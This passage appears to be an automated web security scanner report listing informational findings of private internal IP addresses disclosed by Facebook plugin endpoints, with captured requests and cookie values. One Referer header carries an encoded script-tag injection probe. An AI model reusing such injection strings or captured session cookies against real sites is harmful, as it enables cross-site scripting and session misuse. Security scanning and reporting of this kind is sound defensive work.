User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.94. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.102.42

Request

GET /plugins/like.php?href=http://bucketsoverbroadway.com/2011/06/12/knicks-draft-jimmer-fredette/&layout=button_count&show-faces=false&width=85&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.95. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.215.47

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp?tab=0&dest=New%20York%20City%20(Manhattan),%20NY&mcicid=ssdestdeal2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.96. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.57.45

Request

GET /plugins/like.php?href=http://feedproxy.google.com/~r/PippenAintEasy/~3/cRfqG_RwDBc/&layout=button_count&show-faces=false&width=85&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.97. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.9.38

Request

GET /plugins/like.php?href=http://nugglove.com/2011/06/13/could-faried-be-k-marts-replacement/&layout=button_count&show-faces=false&width=85&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.98. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.238.51

Request

GET /plugins/like.php?app_id=168416309885734&href=http%3A%2F%2Fwww.facebook.com%2Fugodotcom&send=false&layout=button_count&width=90&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.99. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.140.52

Request

GET /plugins/like.php?href=http://thesixersense.com/2011/06/12/new-ownership-and-fan-apathy/&layout=button_count&show-faces=false&width=85&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.100. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.244.37

Request

GET /plugins/like.php?action=recommend&api_key=125384590834102&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df505ed6a4%26origin%3Dhttp%253A%252F%252Fthesouthern.com%252Fff013de94%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=arial&href=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=470 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

22.101. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.96.47

Request

Response

22.102. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.44.41

Request

GET /plugins/like.php?href=http://hardwoodhoudini.com/2011/06/12/how-about-them-mavericks/&layout=button_count&show-faces=false&width=85&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.103. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.9.57

Request

GET /plugins/like.php?action=like&api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df1269acb28%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ffe0d54744%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=arial&href=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311&layout=button_count&locale=en_us&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

22.104. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.136.34

Request

GET /plugins/like.php?href=http://thesmokingcuban.com/2011/06/12/mavs-lead-by-5-after-one-quarter/&layout=button_count&show-faces=false&width=85&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.105. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.254.41

Request

GET /plugins/like.php?api_key=141597515880090&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11185a624%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff28ba604ec%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.expedia.com%2FNew-York-Hotels-Millenium-Hilton.h892034.Hotel-Information%3Folacid%3Dhotel.brand.facebook.like&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=100 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.106. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.91.44

Request

GET /plugins/like.php?href=http://fromrussiawithdunk.com/2011/06/12/better-know-a-draft-prospect-nolan-smith/&layout=button_count&show-faces=false&width=85&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.107. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.110.45

Request

GET /plugins/like.php?href=http://aroyalpain.com/2011/06/12/jimmer-fredette-impresses-sacramento-kings-front-office-in-workout/&layout=button_count&show-faces=false&width=85&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.108. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.213.39

Request

GET /plugins/like.php?api_key=119370714775514&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25ac0190c%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ffa7644554%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.tvfanatic.com%2Fshows%2Fgame-of-thrones%2F&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=328 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.109. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.27.43

Request

GET /plugins/like.php?href=http://aroyalpain.com/2011/06/12/kings-draft-profiles-chris-singleton/&layout=button_count&show-faces=false&width=85&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.110. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.172.120

Request

Response

22.111. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.255.23

Request

Response

22.112. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.253.75

Request

GET /plugins/like.php?action=like&api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df3c8819fd8%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff1ac1529c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=arial&href=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311&layout=button_count&locale=en_us&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

22.113. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.99.51

Request

Response

22.114. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.222.48

Request

GET /plugins/likebox.php?id=108254959223467&width=285&connections=15&stream=false&header=no&height=325 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.115. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.95.33

Request

Response

22.116. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.126.54

Request

Response

22.117. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.94.39

Request

Response

22.118. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.220.31

Request

Response

22.119. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.6.61

Request

Response

22.120. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.61.35

Request

Response

22.121. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.74.99

Request

GET /plugins/likebox.php?id=10150135798400694&width=300&connections=20&stream=false&header=false&height=255 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.122. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.235.55

Request

Response

22.123. http://www.facebook.com/plugins/send.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/send.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.221.77

Request

GET /plugins/send.php?api_key=249141081161&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1947eb01%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff39bc43f7c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%253A%252F%252Fwww.mavsmoneyball.com%252F2011%252F6%252F12%252F2220848%252Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship&locale=en_US&sdk=joey HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

22.124. http://www.facebook.com/plugins/send.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/send.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.52.49

Request

Response

22.125. http://www.facebook.com/widgets/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/widgets/like.php

Issue detail

